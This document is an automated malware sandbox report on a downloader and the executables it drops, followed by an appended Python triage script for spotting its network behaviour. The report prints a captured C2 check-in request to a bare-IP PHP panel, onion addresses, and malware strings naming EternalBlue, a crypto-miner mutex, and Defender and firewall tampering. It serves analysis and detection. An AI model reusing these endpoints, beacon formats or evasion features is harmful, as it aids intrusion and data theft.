      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe | Unpacked PE file: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe | Unpacked PE file: 9.2.ulVElw2mPS2j3QKCM9gOxM3j.exe.400000.0.unpack
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe | Unpacked PE file: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack
      Source: yevbZfdCqR.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe | File created: C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknown | HTTPS traffic detected: 104.21.65.45:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49768 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 104.21.59.252:443 -> 192.168.2.4:49769 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.4:49795 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.4:49796 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.4:49808 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49812 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.4:49813 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.4:49815 version: TLS 1.2
      Source: yevbZfdCqR.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: M5uLwz0sXvZcR89u_43Nm9v8.exe, 0000000E.00000003.701416962.00000000027B3000.00000004.00000001.sdmp
      Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: _.pdb source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: symsrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: UnpackChrome.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: vcruntime140.i386.pdbGCTL source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdb source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: symsrv.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: EfiGuardDxe.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Loader.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: JC:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\sawofasiduboh_85-yehasona\dib.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000000.659045843.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdbn[ source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb, source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: C:\timomamuf\25_t.pdb source: yevbZfdCqR.exe, 00000001.00000003.648989644.0000000005AEF000.00000004.00000001.sdmp, 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000000.656280394.0000000000446000.00000002.00020000.sdmp
      Source: Binary string: \13\TestExeBin\zNoteDebug.pdb source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp
      Source: Binary string: vcruntime140.i386.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: jfiag3g_gg.exe, 00000021.00000002.969839258.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000024.00000002.970581180.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000029.00000002.989528470.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: ^C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: 9.C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Unable to locate the .pdb file in this location source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\pohihusuwunegu\gutuna\vepazipal\bowahifevumu_wosojus yavo.pdb source: yevbZfdCqR.exe, 00000001.00000003.645691149.0000000005C3D000.00000004.00000001.sdmp, MQ5u6_H0cs9EUXsesfNpGUNc.exe, 00000007.00000000.657444831.0000000000434000.00000002.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: The module signature does not match with .pdb signature. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: .pdb.dbg source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: '(EfiGuardDxe.pdbx source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: or you do not have access permission to the .pdb location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\ChromeCookiesView\Release\ChromeCookiesView.pdb source: jfiag3g_gg.exe, 00000017.00000002.728626975.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0043C650 lstrlenW,GetFileSizeEx,SetCommState,GetOverlappedResult,GetMenuInfo,GetMenuCheckMarkDimensions,GetMessageTime,GetConsoleAliasesLengthA,SearchPathW,ReleaseActCtx,LoadLibraryW,GlobalFix,GetBinaryTypeW,SetThreadLocale,SetProcessPriorityBoost,EnumResourceNamesW,FreeEnvironmentStringsA,FindFirstFileA,FindNextFileW,CreateDirectoryExW,GetLocalTime,WriteProfileSectionA,GetPrivateProfileStringW,WriteFile,SetVolumeLabelW,BuildCommDCBW,InterlockedExchange,FindResourceExW,AddAtomW,OpenMutexA,WriteConsoleInputW,GetConsoleScreenBufferInfo,SetConsoleTitleW,CopyFileExW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004625DE __EH_prolog3_GS,FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412D8E _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412F8E __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405764 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h

      Networking:

      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: TrafficSnort IDS: 2032349 ET TROJAN GCleaner Downloader Activity M1 192.168.2.4:49819 -> 138.68.187.227:80
      Source: TrafficSnort IDS: 1948 DNS zone transfer UDP 192.168.2.4:63301 -> 198.13.62.186:53
      Creates HTML files with .exe extension (expired dropper behavior)
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: N13eHI1fs1RwfU6rt0L4y8dk.exe.1.dr
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: 2TN3zgIdiOGqjAjNH5Ty3zw9.exe.1.dr
      Found C&C like URL pattern
Source: global traffic, HTTP traffic detected (23 identical requests): POST /base/api/getData.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 | Content-Length: 133 | Host: 136.144.41.152
Source: global traffic, HTTP traffic detected (1 request): POST /base/api/getData.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 | Content-Length: 113 | Host: 136.144.41.152
      Found Tor onion address
Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmp String found in binary or memory: %safter top-level valuebad type in compare: block device requiredbufio: negative countcheckdead: runnable gcommand not supportedconcurrent map writescouldn't download WUPcouldn't elevate selfcouldn't extract depscouldn't get an eventcouldn't get app namecouldn't get usernamecouldn't hide servicecouldn't open logfilecouldn't open processcouldn't open servicecouldn't scan networkcouldn't set app namecouldn't set defendercouldn't set firewallcouldn't stop servicecouldn't write drivercouldn't write packetdecompression failuredefer on system stackelectrum-server.ninjaelectrum.hodlister.coelectrum.mindspot.orgelectrum.qtornado.comelectrum2.villocq.comembedded/Winmon32.sysembedded/Winmon64.sysembedded/bootmgfw.efiembedded/injector.exeexec: already startedfindrunnable: wrong pfortress.qtornado.comgot TI process handlehelicarrier.bauerj.euhttp: Handler timeouthttp: nil Request.URLhttps://sndvoices.comhttps://spolaect.infoimage: unknown formatin string escape codeinvalid JPEG format: invalid named capturekey is not comparablelink has been severednet/http: nil Contextpackage not installedpanic on system stackparse postal code: %wprocess name is emptyread-only file systemreflect.Value.Complexreflect.Value.Pointerreflect.Value.SetUintreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/breakpoint trapunknown address type unknown empty Contextunsupported extensionunsupported type (%T)user defined signal 1user defined signal 2 into Go struct field %SystemRoot%\system32\(?i)"?((?:.?)+\.exe)"?/lib/time/zoneinfo.zip3smoooajg7qqac2y.onion4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateCompatibleBitmapCreateEnvironmentBlockCreateIoCompletionPortDEBUG_HTTP2_GOROUTINESDateline Standard TimeGeorgian Standard TimeGetEnvironmentStringsWGetTimeZoneInformationGlobal\xmrigMUTEX31337Hawaiian Standard TimeInscriptional_ParthianMAX_CONCURRENT_STREAMSMountain Standard TimeNetLocalGroupAddMemberNtWaitForSingleObject
Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444\Eternalblue-2.2.0.exe\Eternalblue-2.2.0.xmladdress already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memorycouldn't create devicecouldn't get file infocouldn't register testcouldn't select objectcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprocess is created WUPprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codeunexpected payload: %swirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type %s/upload/%s/samples/%s) must be a power of 2
      May check the online IP address of the machine
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeDNS query: name: ip-api.com
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeDNS query: name: ip-api.com
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeDNS query: name: iplogger.org
      Performs DNS queries to domains with low reputation
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDNS query: freeprivacytoolsforyou.xyz
      Source: unknownNetwork traffic detected: IP country count 10
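The network findings above share a few traits a detection engineer can check mechanically: the check-in is a POST to a PHP endpoint on a bare IP with a fixed-size form-encoded body and a Chrome 74 User-Agent that no current browser sends, the dropped components resolve IP-lookup services (ip-api.com, iplogger.org), and the Go binary's string table packs .onion addresses into one unseparated run of text. The following is an added example, not code from the report or from Joe Sandbox. The request, the queried names and the string excerpt are transcribed from the report (the sandbox view strips the CRLFs, so they are restored by hand); the indicator names, the Chrome version floor, the list of IP-lookup services and the benign request used for contrast are this example's own assumptions.

```python
"""Triage helpers for the network findings in the sandbox report above.

Added example, not part of the Joe Sandbox report.  Indicator names,
thresholds and the benign request are assumptions made for illustration.
"""
import re
from ipaddress import ip_address

# "Found C&C like URL pattern" entry, transcribed with CRLFs restored.
C2_REQUEST = (
    b"POST /base/api/getData.php HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\r\n"
    b"Content-Length: 133\r\n"
    b"Host: 136.144.41.152\r\n\r\n"
)

# Constructed benign request for contrast (not from the report).
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\n\r\n"
)

# Names from the "May check the online IP address of the machine" entries;
# a real deployment would carry a longer, maintained list.
IP_LOOKUP_SERVICES = {"ip-api.com", "iplogger.org"}

# Assumption: a hard-coded Chrome major below this is treated as stale.
CHROME_UA_FLOOR = 80

# Excerpt of the "Found Tor onion address" strings: a Go string table is one
# run of text with no separators between entries.
STRING_BLOB = (
    "/lib/time/zoneinfo.zip3smoooajg7qqac2y.onion4656612873077392578125"
    "Aleutian Standard Timebad sweepgen in refillbauerjda5hnedjam.onion"
    "bauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handler"
    "hpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onion"
    "http2: frame too largehttp://ip-api.com/json"
)

# v3 (56 chars) is tried before v2 (16 chars).  Because an address is exactly
# that many base32 chars ending in ".onion", the match is the run immediately
# before the suffix even when the preceding string is glued on without a gap.
ONION_RE = re.compile(r"[a-z2-7]{56}\.onion|[a-z2-7]{16}\.onion")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, {lower-name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_bare_ip(host):
    """True when the Host header is a literal IPv4 address (optionally :port)."""
    host = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def c2_indicators(raw):
    """Return the beacon-like traits a request exhibits, in a fixed order."""
    method, path, headers = parse_request(raw)
    hits = []
    if is_bare_ip(headers.get("host", "")):
        hits.append("host-is-ip")        # no DNS name in front of the panel
    if method == "POST" and path.lower().endswith(".php"):
        hits.append("post-to-php")       # check-in to a PHP panel script
    ctype = headers.get("content-type", "")
    length = int(headers.get("content-length", "0") or 0)
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded") and length < 256:
        hits.append("small-form-post")   # beacon-sized, form-encoded body
    m = re.search(r"Chrome/(\d+)\.", headers.get("user-agent", ""))
    if m and int(m.group(1)) < CHROME_UA_FLOOR:
        hits.append("stale-chrome-ua")   # UA string compiled into the binary
    return hits


def ip_lookup_queries(names):
    """Queried names that belong to public 'what is my IP' services."""
    return sorted(n.lower().rstrip(".") for n in names
                  if n.lower().rstrip(".") in IP_LOOKUP_SERVICES)


def onion_addresses(blob):
    """Extract .onion addresses from an unseparated string table."""
    return ONION_RE.findall(blob)
```

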